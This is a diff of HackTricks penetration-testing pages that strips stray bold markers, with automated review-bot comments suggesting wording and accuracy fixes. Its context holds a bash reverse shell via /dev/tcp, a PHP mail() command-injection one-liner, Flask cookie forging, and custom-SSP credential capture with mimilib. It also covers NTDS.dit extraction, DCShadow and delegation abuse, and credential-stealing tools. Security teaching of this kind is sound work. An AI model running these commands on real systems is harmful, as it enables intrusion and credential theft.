@ -14,7 +14,7 @@ You can choose to:
### Kubeaudit
The tool [**kubeaudit**](https://github.com/Shopify/kubeaudit) **** is a command line tool and a Go package to **audit Kubernetes clusters** for various different security concerns.
The tool [**kubeaudit**](https://github.com/Shopify/kubeaudit) is a command line tool and a Go package to **audit Kubernetes clusters** for various different security concerns.
Kubeaudit can detect if it is running within a container in a cluster. If so, it will try to audit all Kubernetes resources in that cluster:
@ -18,7 +18,7 @@ The difference between “**Roles**” and “**ClusterRoles**” is just where
* **non-resource** endpoints (like /healthz).
* namespaced resources (like Pods), **across all namespaces**.
From **Kubernetes** 1.6 onwards, **RBAC** policies are **enabled by default**. **** But to enable RBAC you can use something like:
From **Kubernetes** 1.6 onwards, **RBAC** policies are **enabled by default**. But to enable RBAC you can use something like:
```
kube-apiserver --authorization-mode=Example,RBAC --other-options --more-options
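Review bot: the modified line contradicts itself: it says RBAC policies are enabled by default and then "But to enable RBAC you can use". Suggest "To make sure RBAC is enabled, start the API server with an authorization mode list that includes it:". It is also worth saying in the text that `Example` in `--authorization-mode=Example,RBAC` is a placeholder mode name, not a real authorizer, so readers do not copy the flag verbatim.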
@ -1,6 +1,6 @@
# Pentesting Network
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks\*\*]\(https://github.com/carlospolop/hacktricks) **that will be reflected in this book.**\
**Don't forget to** give ⭐ on the github to motivate me to continue developing this book.
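Review bot: the context line two lines below the change has a mangled link target: `[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks\*\*]\(https://github.com/carlospolop/hacktricks)` contains escaped `**` and a nested `](` inside the URL, so the link will not render. Suggest `[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks)`, matching the same sentence in the later footer hunk.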
@ -85,7 +85,7 @@ site:ipv6./
### DNS
You could also try to search "**AXFR**"(zone transfer), "**AAAA**"(IPv6) or even "**ANY**" (all) registry in DNS **** to find IPv6 addresses.
You could also try to search "**AXFR**"(zone transfer), "**AAAA**"(IPv6) or even "**ANY**" (all) registry in DNS to find IPv6 addresses.
### Ping6
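Review bot: wording in the modified line: "registry in DNS" should be "DNS records", and AXFR and ANY are query types rather than record types. Suggest: "You could also try **AXFR** (zone transfer), **AAAA** (IPv6) or even **ANY** queries against the DNS servers to find IPv6 addresses."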
@ -33,7 +33,7 @@ The Printer Job Language (PJL) was originally introduced by HP but soon became a
@PJL ENTER LANGUAGE=POSTSCRIPT
```
Inside the **** [**page about port 9100 'raw port'**](../9100-pjl.md) **** you can find more information about **how to enumerate PJL**.
Inside the [**page about port 9100 'raw port'**](../9100-pjl.md) you can find more information about **how to enumerate PJL**.
### PML
@ -56,4 +56,4 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
### SQLi in Flask session cookie with SQLmap
[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) **** uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
@ -30,7 +30,7 @@ PHP comparison tables: [https://www.php.net/manual/en/types.comparisons.php](htt
{% file src="../../../.gitbook/assets/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf" %}
* `"string" == 0 -> True` **** A string which doesn't start with a number is equals to a number
* `"string" == 0 -> True` A string which doesn't start with a number is equals to a number
* `"0xAAAA" == "43690" -> True` Strings composed by numbers in dec or hex format can be compare to other numbers/strings with True as result if the numbers were the same (numbers in a string are interpreted as numbers)
* `"0e3264578" == 0 --> True` A string starting with "0e" and followed by anything will be equals to 0
* `"0X3264578" == 0X --> True` A string starting with "0" and followed by any letter (X can be any letter) and followed by anything will be equals to 0
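Review bot: the list items in this hunk describe PHP 7 and earlier and should say so: PHP 8 changed int-to-string comparison so that `"string" == 0` and `"0X3264578" == 0` are false there, and `"0xAAAA" == "43690"` is already false from PHP 7.0 on, because hexadecimal strings stopped being treated as numeric strings (only `"0e3264578" == 0`, a genuine numeric string, still holds in PHP 8). Also, `0X` on the right-hand side of `"0X3264578" == 0X --> True` is not valid PHP; the intended comparison is against `0`.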
@ -58,7 +58,7 @@ proc_close(proc_open("uname -a",array(),$something));
pcntl_exec("/bin/bash", ["-c", "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"]);
```
**mail / mb\_send\_mail** - **** This function is used to send mails, but it can also be abused to inject arbitrary commands inside the `$options` parameter. This is because **php `mail` function** usually call `sendmail` binary inside the system and it allows you to **put extra options**. However, you won't be able to see the output of the executed command, so it's recommended to create shell script that writes the output to a file, execute it using mail, and print the output:
**mail / mb\_send\_mail** - This function is used to send mails, but it can also be abused to inject arbitrary commands inside the `$options` parameter. This is because **php `mail` function** usually call `sendmail` binary inside the system and it allows you to **put extra options**. However, you won't be able to see the output of the executed command, so it's recommended to create shell script that writes the output to a file, execute it using mail, and print the output:
```bash
file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA+IC90bXAvZmxhZy50eHQKCg==')); chmod('/www/readflag.sh', 0777); mail('', '', '', '', '-H \"exec /www/readflag.sh\"'); echo file_get_contents('/tmp/flag.txt');
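Review bot: in the modified line "usually call `sendmail` binary" should be "usually calls the `sendmail` binary", and the parameter the text calls `$options` is named `$additional_params` in PHP's `mail()` signature (the fifth argument, which is where the `-H ...` string in the one-liner below is passed); using the real name makes the example easier to map back to the text.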
@ -3,7 +3,7 @@
A **HTTP Server with WebDav** active is a server where you probably can **update, delete, move, copy** files. **Sometimes** you **need** to have **valid credentials** (usually check with HTTP Basic Authentication).
You should try to **upload** some **webshell** and **execute** it from the web server to take control over the server.\
Usually, to **connect** a WebDav server you will need valid **credentials**: [**WebDav bruteforce**](../../brute-force.md#http-basic-auth) **** _(Basic Auth)_.
Usually, to **connect** a WebDav server you will need valid **credentials**: [**WebDav bruteforce**](../../brute-force.md#http-basic-auth) _(Basic Auth)_.
Other common configuration is to **forbid uploading** files with **extensions** that will be **executed** by the web server, you should check how to **bypass this:**
@ -3,7 +3,7 @@
## Basic Information
**Uploaded** files go to: _http://10.10.10.10/wp-content/uploads/2018/08/a.txt_\
__**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: **** Using **theme twentytwelve** you can **access** the **404.php** file in**:** [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)****\
__**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in**:** [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)****\
**Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)****
In **wp-config.php** you can find the root password of the database.
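Review bot: the removal is incomplete in this hunk: the new line still ends with `...twentytwelve/404.php)****\` and the following context line ends with `...twentytwelve/404.php)****`, so two empty bold markers survive the commit that is meant to remove them. The second link also points at the twentytwelve path while its text says `/wp-content/themes/default/404.php`.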
@ -159,7 +159,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one *
![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png)
If you get **faultCode** with **** a value **greater** then **0** (17), it means the port is open.
If you get **faultCode** with a value **greater** then **0** (17), it means the port is open.
Take a look to the use of **`system.multicall`**in the previous section to learn how to abuse this method to cause DDoS.
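Review bot: while touching this line, "a value **greater** then **0**" should be "a value **greater** than **0**", and in the context line below, **`system.multicall`**in is missing the space before "in" ("Take a look at the use of **`system.multicall`** in the previous section").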
@ -314,7 +314,7 @@ Some time logon users do not own writable authorization to make modifications to
So, once you have access to a WordPress dashboard, you can attempt installing a malicious plugin. Here I’ve already downloaded the vulnerable plugin from exploit db.
Click [**here**](https://www.exploit-db.com/exploits/36374) **** to download the plugin for practice.
Click [**here**](https://www.exploit-db.com/exploits/36374) to download the plugin for practice.
![](https://i1.wp.com/1.bp.blogspot.com/-Y\_Aw7zSFJZs/XY9pymSjdvI/AAAAAAAAguY/FGyGEzlx9VIqNYyyra9r55IklNmwXwMQwCLcBGAsYHQ/s1600/10.png?w=687\&ssl=1)
@ -181,7 +181,7 @@ You can see the stack for example inside a hex dump:
### Deobfuscating shellcode and getting executed functions
You should try **** [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152).\
You should try [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152).\
It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory.
```bash
@ -264,8 +264,8 @@ If you get the **binary** of a GBA game you can use different tools to **emulate
* ****[**no$gba**](https://problemkaputt.de/gba.htm) (_Download the debug version_) - Contains a debugger with interface
* ****[**mgba** ](https://mgba.io)- Contains a CLI debugger
* ****[**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) **** - Ghidra plugin
* [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) **** - Ghidra plugin
* ****[**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) - Ghidra plugin
* [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) - Ghidra plugin
In [**no$gba**](https://problemkaputt.de/gba.htm), in _**Options --> Emulation Setup --> Controls**_** ** you can see how to press the Game Boy Advance **buttons**
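Review bot: the same empty bold markers survive in the two unchanged list items at the top of this hunk, `* ****[**no$gba**]...` and `* ****[**mgba** ](https://mgba.io)-`; the second one also has the space on the wrong side of the link (`[**mgba**](https://mgba.io) -`). Since this commit is specifically removing `****`, those two lines should be included.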
@ -63,7 +63,7 @@ So, start by performing a scan of type "**Unknown initial value**":
![](<../../.gitbook/assets/image (589).png>)
Then, make the value change, indicate **how** the **value** **changed** (in my case it was decreased by 1) **** and perform a **next scan**:
Then, make the value change, indicate **how** the **value** **changed** (in my case it was decreased by 1) and perform a **next scan**:
![](<../../.gitbook/assets/image (590).png>)
@ -8,7 +8,7 @@ You can create you **own SSP** to **capture** in **clear text** the **credential
#### Mimilib
You can use the `mimilib.dll` binary provided by Mimikatz. **This will log inside a file all the credentials in clear text.**\
****Drop the dll in **** `C:\Windows\System32\`\
****Drop the dll in `C:\Windows\System32\`\
Get a list existing LSA Security Packages:
{% code title="attacker@target" %}
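Review bot: the removal here only catches the second marker; the new line still begins with `****Drop the dll in`, so the leading empty bold marker remains. Also "Get a list existing LSA Security Packages" in the context below is missing "of".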
@ -37,7 +37,7 @@ You can push the changes from a DA or from a user with this minimal permissions:
* The **target object**:
* _WriteProperty_ (Not Write)
You can use **** [**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) to give these privileges to an unprivileged user (notice that this will leave some logs). This is much more restrictive than having DA privileges.\
You can use [**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) to give these privileges to an unprivileged user (notice that this will leave some logs). This is much more restrictive than having DA privileges.\
For example: `Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose` This means that the username _**student1**_ when logged on in the machine _**mcorp-student1**_ has DCShadow permissions over the object _**root1user**_.
### Using DCShadow to create backdoors
@ -6,7 +6,7 @@ This is similar to the basic [Constrained Delegation](constrained-delegation.md)
In this case, the constrained object will have an attribute called _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ with the name of the user that can impersonate any other user against it.
Another important difference from this Constrained Delegation to the other delegations is that any user with **write permissions over a machine account** (_GenericAll/GenericWrite/WriteDacl/WriteProperty/etc_) **** can set the _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ (In the other forms of Delegation you needed domain admin privs).
Another important difference from this Constrained Delegation to the other delegations is that any user with **write permissions over a machine account** (_GenericAll/GenericWrite/WriteDacl/WriteProperty/etc_) can set the _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ (In the other forms of Delegation you needed domain admin privs).
### New Concepts
@ -21,7 +21,7 @@ However, if the **TGS** used in **S4U2Proxy** is **NOT Forwardable** trying to a
Suppose that the attacker has already **write equivalent privileges over the victim computer**.
1. The attacker **compromises** an account that has a **SPN** or **creates one** (“Service A”). Note that **any** _Admin User_ without any other special privilege can **create** up **** until 10 **Computer objects (**_**MachineAccountQuota**_**)** and set them a **SPN**. So the attacker can just create a Computer object and set a SPN.
1. The attacker **compromises** an account that has a **SPN** or **creates one** (“Service A”). Note that **any** _Admin User_ without any other special privilege can **create** up until 10 **Computer objects (**_**MachineAccountQuota**_**)** and set them a **SPN**. So the attacker can just create a Computer object and set a SPN.
2. The attacker configures **resource-based constrained delegation from Service A to the victim host**. 
3. The attacker uses Rubeus to perform a **full S4U attack** (S4U2Self and S4U2Proxy) from Service A to Service B for a user **with privileged access to Service B**. 
1. S4U2Self (from the SPN compromised/created account): Ask for a **TGS of Administrator to me** (Not Forwardable).
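Review bot: the modified step contradicts itself: "**any** _Admin User_ without any other special privilege" should be "**any** _Domain User_", since the _MachineAccountQuota_ it refers to is the limit that lets ordinary domain users create computer objects, which is the whole point of the step. "up until 10" should also be "up to 10".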
@ -86,7 +86,7 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] [**Windows Vault**](windows-local-privilege-escalation/#windows-vault) credentials that you could use?
* [ ] Interesting [**DPAPI credentials**](windows-local-privilege-escalation/#dpapi)?
* [ ] Passwords of saved [**Wifi networks**](windows-local-privilege-escalation/#wifi)?
* [ ] Interesting info in **** [**saved RDP Connections**](windows-local-privilege-escalation/#saved-rdp-connections)?
* [ ] Interesting info in [**saved RDP Connections**](windows-local-privilege-escalation/#saved-rdp-connections)?
* [ ] Passwords in [**recently run commands**](windows-local-privilege-escalation/#recently-run-commands)?
* [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/#remote-desktop-credential-manager) passwords?
* [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/#appcmd-exe)? Credentials?
@ -122,8 +122,8 @@ If you want to **share some tricks with the community** you can also submit **pu
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **** join the [💬](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
****If you want to **share some tricks with the community** you can also submit **pull requests** to **** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) **** that will be reflected in this book.\
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
****If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png>)
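Review bot: the second modified line in this hunk still starts with `****If you want to **share some tricks`, so the leading marker is left behind while the two inside the sentence are removed; the line should start with `If you want to`.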
@ -1,3 +1,3 @@
# WinRM
For information about **** [**WinRM read this page**](../../pentesting/5985-5986-pentesting-winrm.md).
For information about [**WinRM read this page**](../../pentesting/5985-5986-pentesting-winrm.md).
@ -220,7 +220,7 @@ Available since Windows Server 2008.
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
```
You could also use the [**volume shadow copy**](./#stealing-sam-and-system) **** trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) **** trick).
You could also use the [**volume shadow copy**](./#stealing-sam-and-system) trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) trick).
### **Extracting hashes from NTDS.dit**
@ -37,7 +37,7 @@ From [https://www.itprotoday.com/windows-10/what-credential-guard](https://www.i
More information and a PS1 script to enable Credential Guard [can be found here](https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage).
In this case **Mimikatz cannot do much to bypass** this and extract the hashes from LSASS. But you could always add your **custom SSP** and **capture the credentials** when a user tries to login in **clear-text**.\
More information about **** [**SSP and how to do this here**](../active-directory-methodology/custom-ssp.md).
More information about [**SSP and how to do this here**](../active-directory-methodology/custom-ssp.md).
Credentials Guard could be **enable in different ways**. To check if it was enabled using the registry you could check the value of the key _**LsaCfgFlags**_ in _**HKLM\System\CurrentControlSet\Control\LSA**_. If the value is **"1"** the it is active with UEFI lock, if **"2"** is active without lock and if **"0"** it's not enabled.\
This is **not enough to enable Credentials Guard** (but it's a strong indicator).\
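Review bot: grammar in the trailing context of this hunk: "Credentials Guard could be **enable in different ways**" should be "can be **enabled in different ways**", and "If the value is **"1"** the it is active" should be "then it is active". The name is also "Credential Guard", as the linked documentation and the preceding lines spell it.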
@ -1431,21 +1431,21 @@ If you manages to **hijack a dll** being **loaded** by a **process** running as
****[**PrivescCheck** ](https://github.com/itm4n/PrivescCheck)****\
****[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) -- Check for misconfigurations and sensitive files ([check here](broken-reference)). Detected.\
[**JAWS**](https://github.com/411Hall/JAWS) **** -- Check for some possible misconfigurations and gather info ([check here](broken-reference)).\
[**JAWS**](https://github.com/411Hall/JAWS) -- Check for some possible misconfigurations and gather info ([check here](broken-reference)).\
[**privesc** ](https://github.com/enjoiz/Privesc)-- Check for misconfigurations\
[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **** -- It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information. Use **-Thorough** in local.\
[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **** -- Extracts crendentials from Credential Manager. Detected.\
[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **** -- Spray gathered passwords across domain\
[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **** -- Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.\
[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) -- It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information. Use **-Thorough** in local.\
[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) -- Extracts crendentials from Credential Manager. Detected.\
[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) -- Spray gathered passwords across domain\
[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) -- Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.\
[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) -- Basic privesc Windows enumeration\
[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) ~~****~~ -- Search for known privesc vulnerabilities (DEPRECATED for Watson)\
[~~**WINspect**~~](https://github.com/A-mIn3/WINspect) ~~****~~ -- Local checks **(Need Admin rights)**
#### Exe
[**Watson**](https://github.com/rasta-mouse/Watson) **** -- Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
[**SeatBelt**](https://github.com/GhostPack/Seatbelt) **** -- Enumerates the host searching for misconfigurations (more a gather info tool than privesc) (needs to be compiled) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
****[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **** -- Extracts credentials from lots of softwares (precompiled exe in github)\
[**Watson**](https://github.com/rasta-mouse/Watson) -- Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Enumerates the host searching for misconfigurations (more a gather info tool than privesc) (needs to be compiled) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
****[**LaZagne**](https://github.com/AlessandroZ/LaZagne) -- Extracts credentials from lots of softwares (precompiled exe in github)\
[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) ~~****~~ -- Check for misconfiguration (executable precompiled in github). Not recommended. It does not work well in Win10.\
[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Check for possible misconfigurations (exe from python). Not recommended. It does not work well in Win10.
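Review bot: this hunk leaves more empty bold markers than it removes: the unchanged `****[**PrivescCheck** ]...****` and `****[**PowerSploit-Privesc(PowerUP)**]` lines, the new `****[**LaZagne**]` line (only its second marker was dropped), and the struck-through `~~****~~` fragments on the Sherlock, WINspect and Beroot lines. A single pass with the same pattern over the whole block would be cleaner than fixing individual lines. While here, "crendentials" (Invoke-WCMDump) should be "credentials" and "lots of softwares" should be "lots of software".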
@ -88,4 +88,4 @@ Full token privileges cheatsheet at [https://github.com/gtworek/Priv2Admin](http
## Reference
* Take a look to this table defining Windows tokens: [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin)
* Take a look to [**this paper**](https://github.com/hatRiot/token-priv/blob/master/abusing\_token\_eop\_1.0.txt) **** about privesc with tokens**.**
* Take a look to [**this paper**](https://github.com/hatRiot/token-priv/blob/master/abusing\_token\_eop\_1.0.txt) about privesc with tokens**.**